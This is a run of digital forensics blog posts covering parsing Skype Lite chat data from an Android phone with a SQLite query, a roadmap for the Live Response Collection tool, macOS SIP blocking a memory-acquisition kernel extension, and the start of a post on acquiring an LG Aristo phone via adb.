<span style="font-size: large;">Naturally I was drawn to the "live:iamsarahthompson1990.db" database, as the other two databases have fairly mundane names, plus the file size was considerably larger. </span><span style="font-size: large;"><br /><br /><br /><b>Chapter 3: Parsing the data</b></span><br />
<br />
<span style="font-size: large;">Now that I had identified my database, it was a question of figuring out what table was going to contain what I was looking for. Fortunately most of the tables follow an easy to recognize naming conventions, so I focused my efforts on the "chatItem" table</span><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhk2pWhVHmypsPlLeGQLIKtREW6iTHmOAVZ9DWi5qViuDWm1jHmALboXS14AwdZUjUGHYPoOWiM_iLxXOadSTCe5QWdWuUBdV5klNUo9ybCXSm7Q4zldqRM0440mvAhyphenhyphentZ2xCcHyXhxTrS/s1600/chatItemdb.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto; text-align: center;"><img border="0" data-original-height="792" data-original-width="1600" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhk2pWhVHmypsPlLeGQLIKtREW6iTHmOAVZ9DWi5qViuDWm1jHmALboXS14AwdZUjUGHYPoOWiM_iLxXOadSTCe5QWdWuUBdV5klNUo9ybCXSm7Q4zldqRM0440mvAhyphenhyphentZ2xCcHyXhxTrS/s640/chatItemdb.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">The table "chatItem" from the user database</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;"><br />I need to do some more testing on what the flags actually mean, but for now this particular SQLite query should work quite well if you also come across it (please keep reading though, as there are caveats on WHEN to use this query)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><i>SELECT DATETIME(chatItem.time / 1000, 'unixepoch') as "Date/Time (UTC)", person_id as Sender, content as Message, CASE type WHEN 9 THEN "Received" WHEN 10 THEN "Sent" WHEN 12 THEN "Multimedia Sent" WHEN 1 THEN "Unknown" END as "Type", status as "Status", CASE deleted WHEN 1 THEN "Yes" WHEN 0 Then "" END as "Deleted", edited as "Edited", retry as "Retry", file_name as "Multimedia File Name", device_gallery_path as "Multimedia Path On Device" FROM chatItem</i></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Once you input the above SQLite query, you can end up with a nicely formatted output which is easy to look at, like this (the output was pasted from SQLite Spy to a tsv file, then opened and formatted in Excel)</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTpTnfVAfpSB6849Wj4tWDa-942sElxyd5kweda4HHBpRzT_yRmvL8RkRg5Eb27W5KpNhXt1X-SSnR5fZ5pEiSaLDxC54Grgi8Q6JPsJi6xwdQtmXcCFFnw1BGFYtSKl_Pe5yloFusIm96/s1600/RefinedSkypeChats.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="561" data-original-width="1600" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTpTnfVAfpSB6849Wj4tWDa-942sElxyd5kweda4HHBpRzT_yRmvL8RkRg5Eb27W5KpNhXt1X-SSnR5fZ5pEiSaLDxC54Grgi8Q6JPsJi6xwdQtmXcCFFnw1BGFYtSKl_Pe5yloFusIm96/s640/RefinedSkypeChats.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Cleaned up Skype chats</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><b>Chapter 4: What the heck is going on here??</b></span><br />
<br />
<span style="font-size: large;">After much discussion on exactly "what" was happening here with Jessica, it turns out that it is actually a couple of things that all combined to have the data stored like this.</span><br />
<br style="font-size: x-large;" />
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: large;">First of all, remember the model number that I listed? Well, this is the Global version of the Galaxy S6 Edge. That means that some apps are pre-bundled, and in this case Microsoft apps (including Skype) were included by default. After I updated the app to what looked like the latest version on the Play Store, I did my data pull (I chose to do this, rather than pull from APK Mirror, because I wanted to see if the latest app version was supported with my tools). However, one important caveat to note, is that this device is running Android 5.1.1 (because it is super easy to root an older version of Android and get a full image of the device, which is what is needed for the data analysis portion of the Cyber Sleuth workshop). Android 5 currently accounts for almost 18% of all Android devices on the market (kinda surprising, I know). </span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0u3aAlgSEoLYYG3JDxbPKkNnZLMG9rpYSewOkDB85DV-mhLeMbbDj0UWhmhVX8Se1MpZI_BcoLlBv72pjtYXFMLzQiv6-_Iqgphf3hJnwzjuh5K0oT8NUgrMQlBk7pFrUKka5NRjD-JqR/s1600/Screen+Shot+2018-11-27+at+3.28.40+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="601" data-original-width="880" height="436" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0u3aAlgSEoLYYG3JDxbPKkNnZLMG9rpYSewOkDB85DV-mhLeMbbDj0UWhmhVX8Se1MpZI_BcoLlBv72pjtYXFMLzQiv6-_Iqgphf3hJnwzjuh5K0oT8NUgrMQlBk7pFrUKka5NRjD-JqR/s640/Screen+Shot+2018-11-27+at+3.28.40+PM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Android market saturation as of October 26, 2018, retrieved on November 27, 2018 from <a href="https://developer.android.com/about/dashboards/">https://developer.android.com/about/dashboards/</a></span></i></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-size: large; text-align: start;">The issue here is that although according to the Google Play Store I was updating to the latest version of Skype, in reality because the "new" versions of Skype are not compatible with older Android versions (by default the SM-G925F (told you that you would see it again) ships with Android 5), it was actually installing "Skype Lite". Even though, as you can clearly see from the screenshots, the Google Play Store was telling me that "Skype" was indeed installed, and "Skype Lite" was not. </span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfgQhU3RODd7I9YvzZ5CCusq5ppr7gnXQH56Z3amjHaz4Vm5frV5tPPNAZqyQgQp2QNAJqIffXNOPub19hhPIJ2yaONm68TSlwJ-7hgL-cIMr-_Bs3wmvoedBpnJSk_d3xZeOVzJ-p4PHk/s1600/Screenshot_2018-11-27-15-51-11.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1600" data-original-width="900" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfgQhU3RODd7I9YvzZ5CCusq5ppr7gnXQH56Z3amjHaz4Vm5frV5tPPNAZqyQgQp2QNAJqIffXNOPub19hhPIJ2yaONm68TSlwJ-7hgL-cIMr-_Bs3wmvoedBpnJSk_d3xZeOVzJ-p4PHk/s640/Screenshot_2018-11-27-15-51-11.png" width="360" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">"Skype" application information from the S6 Edge</span></i></td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMnutF1z2lFkKezkOZ8cWWrjEV94f7eQdjHkd9Nrm1v9mRxomRmxgbUWrmreb94PeYooOIK1sSF-tH-zJan52MpUAFGAh4o8Fjix2MkGpA4cQn7W3_NWYgiXnYDagjbdDj9lZzb0lCL_aA/s1600/Screenshot_2018-11-27-15-51-27.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1600" data-original-width="900" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMnutF1z2lFkKezkOZ8cWWrjEV94f7eQdjHkd9Nrm1v9mRxomRmxgbUWrmreb94PeYooOIK1sSF-tH-zJan52MpUAFGAh4o8Fjix2MkGpA4cQn7W3_NWYgiXnYDagjbdDj9lZzb0lCL_aA/s640/Screenshot_2018-11-27-15-51-27.png" width="360" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">According to this, Skype is installed</span></i></td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy0biBGqYHD8DDd_U8cjwcHV92ENTlDBrpdmwg7JjhV_YBE_0X_hUU3Jc0D3V0pJMMNwiROQWC8PWj1uZpuoZRwE9ozIGMBU6aLdm5QZoiuitFcCe4_jEX4q-lRQ6BHtve9x9g4IMSWseN/s1600/Screenshot_2018-11-27-15-51-43.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1600" data-original-width="900" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy0biBGqYHD8DDd_U8cjwcHV92ENTlDBrpdmwg7JjhV_YBE_0X_hUU3Jc0D3V0pJMMNwiROQWC8PWj1uZpuoZRwE9ozIGMBU6aLdm5QZoiuitFcCe4_jEX4q-lRQ6BHtve9x9g4IMSWseN/s640/Screenshot_2018-11-27-15-51-43.png" width="360" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">This screen suggests that "Skype Lite" is a different application</span></i></td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilz4UcPFDZN9Rb8Dv8B_6jCw9ias_hdb-zSLbdhBr0a6pDtJ2OedLP73kajA2LdAaXKDiGaFkksx26M6Hp-gct5bMDnS7JaeAyntVY-zVb5sM5q2k4tGJkGK6gL8TA0EmjqHNU0Ml_Qo2U/s1600/Screenshot_2018-11-27-15-51-51.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1600" data-original-width="900" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilz4UcPFDZN9Rb8Dv8B_6jCw9ias_hdb-zSLbdhBr0a6pDtJ2OedLP73kajA2LdAaXKDiGaFkksx26M6Hp-gct5bMDnS7JaeAyntVY-zVb5sM5q2k4tGJkGK6gL8TA0EmjqHNU0Ml_Qo2U/s640/Screenshot_2018-11-27-15-51-51.png" width="360" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">This confirms that, according to the Play Store, "Skype Lite" is indeed a different application on my Galaxy S6 Edge running Android 5.1.1</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><b>Chapter 5: Whew. No changes. But support is needed</b></span><br />
<br />
<span style="font-size: large;">As you may have guessed, Skype Lite actually stores data in a different fashion than traditional Skype itself. Most of the tools on the market today are set to handle Skype data, but not Skype Lite. This is the reason that AXIOM did not detect Skype data, because it does not (yet) have the support for Skype Lite, it only has support for Skype itself. And although it was initially suspected, Skype itself did not undergo a drastic change, it was just a combination of things that resulted in Android/Google Play/Skype doing something that was totally unexpected, because of the the base installation of Android that was running. <br /><br /><u>NOTE: </u>If I was running Android 6 or later on the device, the aforementioned tools should parse the data, but we will have to hold onto that thought for testing for another day :)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><b>Chapter 6: The Grand Finale</b></span><br />
<br />
<span style="font-size: large;">If you made it all the way down here, congratulations for sticking with this adventure. It has definitely been a fun one! </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Always remember that, at the end of the day, tools are just tools, and they have limitations and shortcomings. In a perfect world every tool could handle all the data from every application from every device. But we all know that is not going to happen. Don't be afraid to dig into the data itself, because you might find that an entire data structure is not being parsed properly. Or that the formats have changed. Or, you may find through a series of events that your device is running a different application, with a different storage structure, than what the device is "telling" you what is really running!</span><br />
<span style="font-size: large;"><br /></span>Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com0tag:blogger.com,1999:blog-1547389155659419533.post-51631273624991527642018-08-08T16:15:00.001-04:002018-08-08T16:15:59.737-04:00Live Response Collection Development Roadmap for 2018<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Hello again readers and welcome back! It's been a little while ...OK, a long while... since I've made updates to the Live Response Collection. Rest assured for those of you who have used, and continue to use it, that I am still working on it, and trying to keep it as updated as possible. For the most part it has far exceeded my expectations and I have heard so much great feedback about how much easier it made data collections that users and/or businesses were tasked with. The next version of the LRC will be called Cedarpelta, and I am hoping for the release to take place by the end of this year.</span><br />
<span style="font-size: medium;"><span style="font-size: medium;"><br /></span>
<span style="font-size: large;"><br />
As most Mac users have likely experienced by now, not only has Apple implemented macOS, they have also changed the file system to APFS, from HFS+. Because the Live Response Collection interacts with the live file system, this really does not affect the data collection aspects of the LRC. Although it DOES affect third party programs running on a Mac, <a href="https://www.brimorlabsblog.com/2018/07/lets-talk-about-kext.html" target="_blank">as detailed in my previous blog post.</a> <br /><br /><br />Although the new operating system updates limits what we can collect leveraging third party tools, there are a plethora of new artifacts and data locations of interest, and to ensure the LRC is collecting data points of particular interest, I've been working with the most knowledgeable Apple expert that I (and probably a large majority of readers) know, Sarah Edwards (<a href="https://twitter.com/iamevltwin" rel="nofollow" target="_blank">@iamevltwin</a> and/or <a href="https://www.mac4n6.com/" rel="nofollow" target="_blank">mac4n6.com</a>). As a result of this collaboration, one of the primary features of the next release of the LRC will be much more comprehensive collections from a Mac!</span></span><br />
<span style="font-size: large;"><br />
<br />For the vast majority of you who use the Windows version of the Live Response Collection, don't fret, because there will be updates in Cedarpelta for Windows as well! These will primarily focus on Windows 10 files of interest, but also will include some additional functionality for some of the existing third-party tools that it leverages, like <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns" target="_blank">autoruns</a>.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo27xxahpUGLLOovpiO_Qgv3a6fMKltwJ0CMRLRay62vwGrj_XPo-rBOfGGG45RMpsxsZZpl6x8mUtH2_Era0oAQtLs38jaJAkAPX4KS0zkjhv8tWH4gtyfUV36dwPgkEfPvnYVA54ORXU/s1600/Screenshot+2018-08-08+at+15.02.38.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="323" data-original-width="655" height="314" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo27xxahpUGLLOovpiO_Qgv3a6fMKltwJ0CMRLRay62vwGrj_XPo-rBOfGGG45RMpsxsZZpl6x8mUtH2_Era0oAQtLs38jaJAkAPX4KS0zkjhv8tWH4gtyfUV36dwPgkEfPvnYVA54ORXU/s640/Screenshot+2018-08-08+at+15.02.38.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Autoruns 13.90 caused an issue, and was fixed very quickly once the issue was reported (thanks to <a href="https://twitter.com/KyleHanslovan" target="_blank">@KyleHanslovan</a>)</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;"><br />As always, if there are any additional features that you would like to see the LRC perform, please reach out to me, through Twitter (</span><span style="font-size: medium;"><span style="font-size: large;"><a href="https://twitter.com/brimorlabs">@brimorlabs</a> or <a href="https://twitter.com/brianjmoran">@brianjmoran</a>) or the contact form on my website (<a href="https://www.brimorlabs.com/contact/">https://www.brimorlabs.com/contact/</a>) or even by leaving a comment on the blog. I will do my best to implement them, but remember, the LRC was developed in a way that allows users to create their own data processing modules, so if you have developed a module that you regularly use, and you would like to (and have the authority to) share it, please do, as it will undoubtedly help other members of the community as well!</span></span><br />
<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;"><br /></span><span style="font-size: large;"><br /></span>Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com0tag:blogger.com,1999:blog-1547389155659419533.post-12693874475164521242018-07-17T08:49:00.003-04:002018-07-17T08:49:37.193-04:00Let's Talk About Kext<br />
<span style="font-size: large;">Hello again readers and welcome back! Today's blog post is going to cover some of the interesting things I found poking around MacOS while developing updates to the Live Response Collection. First off, I have to offer my thanks to <a href="https://twitter.com/iamevltwin">Sarah Edwards</a> for taking the time to talk about what she has done with regards to the quirkiness ("official technical term") regarding MacOS, System Integrity Protection ("SIP"), kernel extensions, and everything else that completely derailed my plans for pulling data from a Mac!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br />Our story begins by trying to diagnose some errors that I noticed while trying to perform a memory dump on my system using osxpmem. The errors were related to my system loading the kernel extension MacPmem.kext, which resulted in the error message "<i style="background-color: #eeeeee;">/Users/brimorlabs/Desktop/Cedarpelta-DEV/OSX_Live_Response/Tools/osxpmem_2.1/temp/osxpmem.app/MacPmem.kext failed to load - (libkern/kext) system policy prevents loading; check the system/kernel logs for errors or try kextutil(8).</i></span><span style="font-size: large;">". Even though I was running the script as root, for some reason the kext was failing to load. </span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUdQavD82hq1G3dmPUB6XrR1WUr8j-L57031iv0fdTZZJtqaK1PX0MYFdZ4Xl3YGwLmotnJKj8vLglLoR_1tB_RJ8sspuR8t6rRkReXrOhlkS1_nfqPK9JBhDHqgcOLfKL-eqQ9sLIF51r/s1600/Screen+Shot+2018-07-13+at+10.31.08+AM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="538" data-original-width="1516" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUdQavD82hq1G3dmPUB6XrR1WUr8j-L57031iv0fdTZZJtqaK1PX0MYFdZ4Xl3YGwLmotnJKj8vLglLoR_1tB_RJ8sspuR8t6rRkReXrOhlkS1_nfqPK9JBhDHqgcOLfKL-eqQ9sLIF51r/s640/Screen+Shot+2018-07-13+at+10.31.08+AM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>That weird error message is weird</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The Live Response Collection script has always changed the owner of the kernel extension, so I knew that ownership was also not the problem, so that left me in a bit of a bind. Fortunately the tool "kextutil" is included on a standard Mac load, so I hoped that running that command could shed some light on my issues. The results from running kextutil were mostly underwhelming, with the exception of .... what the heck is that path? </span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs-SHS2_RCqlLHVIjqK5lIgzHMzq8Zrkxz87kCFz-waWiz5zyx9xVw8dtq0tQZqaUzF2iaboRKuPS4Eh6ydSizvHwjmQkMMn6de_NjDp9a7dSMQRE0MMfCZn5fXhzMOeexHE1Jpk5FqdDQ/s1600/Screen+Shot+2018-07-13+at+10.11.09+AM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1038" data-original-width="1456" height="456" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs-SHS2_RCqlLHVIjqK5lIgzHMzq8Zrkxz87kCFz-waWiz5zyx9xVw8dtq0tQZqaUzF2iaboRKuPS4Eh6ydSizvHwjmQkMMn6de_NjDp9a7dSMQRE0MMfCZn5fXhzMOeexHE1Jpk5FqdDQ/s640/Screen+Shot+2018-07-13+at+10.11.09+AM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Output from kextutil. What is "/Library/StagedExtensions/Users/brimorlabs/Desktop/Cedarpelta-DEV/OSX_Live_Response/Tools/osxpmem_2.1/osxpmem.app/MacPmem.kext" and why are you there, and not the folder you are supposed to be in?</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /><br />The actual path on disk was "</span><span style="background-color: #eeeeee; text-align: center;"><span style="font-size: large;"><i>Users/brimorlabs/Desktop/Cedarpelta-DEV/OSX_Live_Response/Tools/osxpmem_2.1/osxpmem.app/MacPmem.kext</i></span></span><span style="font-size: large;">", but for some reason the operating system was putting it in another spot. OK, that seems really weird, so why is my system doing stuff that I don't specifically want it to do? Oh Apple, how very Python of you! :)</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9XqW1SEkDneLo1V5MP8oG6677vutbVmvUScgrmAv81kkoFcL8OK-zHIQn6_MPrZQdPBvMm6EqwInteIlJqRK9fNW8SMN89DSPVlccZDc_EiDEFRio24fxMDsuXUPfCqhd4rUZGsYLEHAZ/s1600/Screen+Shot+2018-07-13+at+11.00.04+AM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="342" data-original-width="1562" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9XqW1SEkDneLo1V5MP8oG6677vutbVmvUScgrmAv81kkoFcL8OK-zHIQn6_MPrZQdPBvMm6EqwInteIlJqRK9fNW8SMN89DSPVlccZDc_EiDEFRio24fxMDsuXUPfCqhd4rUZGsYLEHAZ/s640/Screen+Shot+2018-07-13+at+11.00.04+AM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>osxpmem/MacPmem.kext related files under the "/Library/StagedExtensions" path</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">As it turns out, thanks to quite a bit of research, the "Library/StagedExtensions" folder is, in very basic terms, the sandbox in which MacOS puts things that it does not trust, as a function of SIP. Now, if you were presented with the "Do you trust this extension" prompt ...</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ1YYJz2NssHN7nb7AYtUgvnLZZ-ljXvBYMdZ154YZB7VvQY4fuib_20pfykB2HqHPx_qGnLlU_Gqe650o5NefDE_dxvRq81flVn2SxhF9CaNSySY_bxA4Zwb0_MeBRWpPwTXz7pK4Kjoc/s1600/blocked.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="353" data-original-width="849" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ1YYJz2NssHN7nb7AYtUgvnLZZ-ljXvBYMdZ154YZB7VvQY4fuib_20pfykB2HqHPx_qGnLlU_Gqe650o5NefDE_dxvRq81flVn2SxhF9CaNSySY_bxA4Zwb0_MeBRWpPwTXz7pK4Kjoc/s640/blocked.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>This is what the "System Extension Blocked" popup looks like. This is NOT the popup you see with osxpmem</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /><br />... then, if you navigate to "Security & Privacy" and click on the </span><span style="font-size: large;">"General" tab, </span><span style="font-size: large;">and clicked "Allow"</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0OZO-w7LHgdWSVnwV2PlJMVS6ag9xuhh_qrK4NHB6G5LAHfU0-oNRCewkj-qXzlpKKBehWjGAhPg8-XNgEp8OehkBd1I2AlUGTBJKGgH_jOxTov3zxgFL8hBS2clY7FrkrYtk2Z95k6KC/s1600/Screen+Shot+2018-07-13+at+10.57.39+AM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1146" data-original-width="1330" height="550" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0OZO-w7LHgdWSVnwV2PlJMVS6ag9xuhh_qrK4NHB6G5LAHfU0-oNRCewkj-qXzlpKKBehWjGAhPg8-XNgEp8OehkBd1I2AlUGTBJKGgH_jOxTov3zxgFL8hBS2clY7FrkrYtk2Z95k6KC/s640/Screen+Shot+2018-07-13+at+10.57.39+AM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Security & Privacy - "General". Note the "System software from developer REDACTED was blocked from loading" and the "Allow" button</i></span></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-size: large;"><br />It would (ok, *should*) then stop the symbolic linking (that is what I assume is happening, although that is not confirmed yet) from the original folder to the StagedExtension folder to allow the sandboxing/SIP to occur. That means that the kernel extension would then be able to run, and the world would be a glorious place. Except.....it seems that once a developer/company signs their kext, which allows the bypassing of SIP, that means that EVERYTHING signed by them in the future will also, automatically, be trusted. Obviously this could present a security issue down the road if those signing certificates would be stolen. I don't know of that happening yet, but it does seem like it is plausible and could presumably happen in the future.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">I've tried a couple of workarounds to bypass the SIP process to allow me to dump memory from a system without having to go through all of the bypass sip/csrutil steps (if you are unfamiliar with that, please <a href="http://lmgtfy.com/?q=bypass+sip+csrutil">follow the link here</a>). None of my attempts succeeded yet, but I am still trying. I specifically do NOT want to reboot the computer, because I want to collect memory from the system and not potentially lose volatile data. I will either update this post, or continue this as a series, when I find a sufficient work around (if there is one) to this issue! With that being said, if you found a way to dump memory from a MacOS live system that has SIP enabled, and if you are able to share it publicly (or privately) please share your methodology. I would love for the next LRC update to be able to include memory dumps from systems with SIP enabled!</span>Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com0tag:blogger.com,1999:blog-1547389155659419533.post-27070213693697328742018-06-17T11:32:00.000-04:002018-06-17T11:32:45.123-04:00Who's Down With PTP?<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-size: large;">Hello again readers and welcome back! Today's blog post covers a series of (unfortunate) events that I had to work through in order to acquire data from an LG Aristo phone. These methods might also work for other devices, especially ones that are severely locked down, such as those that are primarily utilized on pre-paid plans, such as TracFone. (DISCLAIMER: I am *NOT* claiming that this will work all the time. It seems that tech companies/developers sometimes take shortcuts (*gasp*) which means that devices don't quite function the way they are "supposed" to function.)<br /><br /><br />Our journey begins with using Magnet Axiom (thanks <a href="https://twitter.com/B1N2H3X">Jessica</a>!) in an attempt to acquire data, and subsequently process that data, from a stock Android device. Following the very concise, user-friendly prompts, all of the steps were properly taken in an effort to acquire the device. However, the first issue arose when the "Trust this computer" prompt never came up on the Aristo itself. Since I've had many experiences with mobile devices in the past, my first thought was to fire up Android Debug Bridge (adb) in an attempt to make sure that adb was properly recognizing the device. Because if adb can't recognize it, acquisition through just about any commercial tool just won't work. Interestingly, choosing the "Charging only" option from the USB option in Developer mode, which is usually the standard in Android device acquisition, results in nothing being recognized in adb.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
